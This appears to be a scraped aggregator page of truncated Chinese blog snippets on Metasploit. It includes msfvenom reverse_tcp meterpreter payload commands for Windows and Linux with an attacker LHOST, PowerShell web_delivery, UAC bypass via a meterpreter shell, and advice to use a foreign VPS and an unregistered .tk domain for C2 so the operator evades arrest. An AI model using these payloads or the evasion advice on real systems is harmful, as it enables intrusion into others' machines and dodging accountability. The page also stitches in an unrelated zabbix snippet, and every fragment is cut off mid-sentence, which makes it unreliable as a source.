0x01 描述 使用powershell上线MSF，使用的不是msf中exploit/multi/handler模块，而是使用的exploit/multi/script/web_delivery类 0x02 过程 use exploit/multi/script/web_delivery ...

正文 域名和CDN配置 需要的东西：一台国外的VPS 这里我推荐vultr （腾讯云和阿里云等国内的VPS是不支持免备案的） 说到域名上线，自然就不能老老实实的去用自己备案了的域名，不然又是一个当场逮捕。 到这里https://freenom.com/ 注册一个免费且不用备案的的tk域名 ...

使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用（exploit）中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的，ShellCode是真正的被输入到存在漏洞的程序中 ...

由于绕过 UAC 的功能需在 meterpreter 的shell 才能实现。因此，我们首先要做的就是取得目标机器的 meterpreter shell 。 生成一个 payload ： msfvenom -p windows/meterpreter/reverse_tcp lhost ...

Linux 　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< You ...

由于之前安装都是拷贝同事的zabbix_agent.tar.gz包,可是我在网上找了一大圈都没有找到这个tar包是从哪里来的,毕竟新手,太笨...so最后自己排错,找到了比较便捷的方式,直接通过yum ...

生成msf常用payload msf作为一款强大的漏洞检测工具，如何生成适用于msf的payload以及如何利用是使用msf的关键，今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom，下面看看他的帮助信息。 在kali下可以使 ...

两种方式 msf生成的payload分为正向和反向两种，正向需要正向连接，反向需要反向连接，反向是最常用的方式 正向连接指被攻击的目标机器通过正向的payload打开一个端口，攻击者的机器去连接目标机器的这个端口，从而建立连接 如果把攻击机器比喻成你，目标机器比喻成妹子，正向连接相当于你去追追 ...